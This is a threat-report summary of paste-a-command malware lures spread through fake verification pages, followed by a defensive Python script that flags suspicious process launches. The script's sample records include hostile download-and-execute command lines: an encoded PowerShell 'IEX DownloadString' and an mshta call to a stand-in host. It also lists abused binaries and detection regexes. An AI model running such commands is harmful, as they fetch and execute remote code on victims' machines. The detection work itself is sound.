Overview
- Attackers deliver links via compromised hotel and Booking.com accounts, WhatsApp messages, and top Google search results to build trust before directing targets to fake verification pages.
- Victims are instructed to copy and paste a single command into a terminal or command prompt, which silently fetches and installs malware without obvious signs of compromise.
- Campaign pages detect the visitor’s device and serve tailored payloads for Windows and macOS, with one documented Windows case installing the PureRAT malware behind a fake Cloudflare CAPTCHA.
- Many payloads rely on living-off-the-land binaries and base64-encoded commands that are staged in the browser sandbox for the victim to copy and paste, which limits what security tools can see and leaves few traces on disk.
- Microsoft Defender and similar tools can sometimes stop these attacks but are not foolproof, prompting experts to advise users never to paste commands from unfamiliar sites and to verify suspicious messages directly.
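As an added defender-side example (not code from the original report), this Python script triages Windows process-creation records for the pattern described above: a living-off-the-land binary started directly from explorer.exe, a base64-encoded PowerShell command that it decodes, and download-and-execute cues in the command line. The LOLBin list, the record field names and the three sample records are assumptions constructed for the demo.

```python
import base64
import re

# Binaries commonly abused by paste-a-command lures (assumed list, not taken from the page).
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "certutil.exe", "curl.exe", "bitsadmin.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_FLAG = re.compile(r"-e[a-z]{0,13}\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DOWNLOAD_CUES = re.compile(
    r"downloadstring|invoke-webrequest|invoke-expression|\biwr\b|\biex\b|https?://", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze_process_event(event):
    """Return the reasons one process-creation record looks like a pasted ClickFix command."""
    reasons = []
    image = event["image"].lower().rsplit("\\", 1)[-1]
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    if image in LOLBINS and parent == "explorer.exe":
        reasons.append(f"{image} launched directly from explorer.exe (Run dialog or pasted command)")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        reasons.append("base64-encoded PowerShell command decoded")
    if DOWNLOAD_CUES.search(decoded or event["cmdline"]):
        reasons.append("download-and-execute pattern in command line")
    return reasons

def _encode_ps(script):
    """Build a -EncodedCommand argument (used here only to construct sample telemetry)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process-creation records (not real logs): two lure-style launches, one benign task.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc "
                + _encode_ps('IEX (New-Object Net.WebClient).DownloadString("https://example.invalid/v")')},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]
```

Run `analyze_process_event` over each entry in `SAMPLE_EVENTS`: the two lure-style records produce findings, the scheduled-task record produces none.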